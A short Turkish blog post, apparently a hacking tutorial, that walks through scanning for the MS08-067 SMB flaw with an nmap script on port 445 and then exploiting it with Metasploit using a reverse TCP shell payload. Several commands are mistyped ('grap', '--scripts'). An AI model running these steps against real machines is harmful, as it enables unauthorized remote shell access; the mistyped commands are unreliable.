Genelde 2000li windows Serverlarda ve xp makinalarda bulunur.SMB üzerine yazılmış bir exploittir.
Bu zafiyeti tespit etmek için sistem üzerine bilindik bir nmap taraması yapabiliriz.Fakat ben size nmap scriptini kullanarak tarama yapmasını göstereceğim.
usr/share/nmap/scripts/
-ls | grap “ms08”
karşımıza çıkan scripti kopyalıyoruz ve
nmap –scripts script adı ip adresi -p445 ile(www.sechunterz.pw)sistemde tarama yaptırıyoruz ve zafiyetin olduğunu gözlemliyoruz.
daha sonra msfconsole’dan
use exploit/windows/smb/ms08_067_netapi
set rhost ile rhost u giriyoruz.
set payload windows/shell/reverse_tcp
set LHOST ile LHOST’u giriyoruz ve
run diyerek exploiti başlatıyoruz.
0 comments:
Yorum Gönder